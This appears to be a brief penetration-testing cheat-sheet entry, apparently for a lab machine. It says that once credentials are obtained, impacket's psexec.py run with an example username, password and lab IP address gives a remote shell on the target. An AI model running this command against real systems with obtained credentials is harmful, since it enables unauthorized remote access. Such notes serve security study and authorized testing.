Got creds? do this

use impacket's "psexec.py"

psexec.py pentest:'P3nT3st!'@10.10.10.152

this will let you get a shell.

Last updated